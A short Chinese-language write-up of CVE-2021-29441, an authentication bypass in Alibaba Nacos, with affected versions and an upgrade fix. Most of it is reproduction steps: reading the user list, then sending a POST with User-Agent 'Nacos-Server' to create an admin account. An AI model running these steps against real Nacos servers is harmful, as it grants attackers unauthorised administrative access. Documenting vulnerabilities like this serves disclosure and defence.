CVE-2021-29441(Alibaba Nacos权限认证绕过漏洞)
做测试遇到的新漏洞,记录下。挺简单的。
简介:
Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。
漏洞概述:
Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的认证绕过漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。
漏洞复现:
1、在url处添加访问一下网址即可查看到用户列表
/nacos/v1/auth/users?pageNo=1&pageSize=10
2、访问以下链接并使用burp抓包,然后把get请求改为post,把修改User-Agent头改为Nacos-Server
http://your-ip:8848/nacos/v1/auth/users
3、构造数据包添加一个admin用户,然后发送POST请求,返回为200,表示创建用户成功
username=admin&password=admin
4、回到登录界面,使用添加的账号密码进行登录,可以看到登录成功
影响版本:
Nacos <= 2.0.0-ALPHA.1
修复建议:
升级到最新版本的 Nacos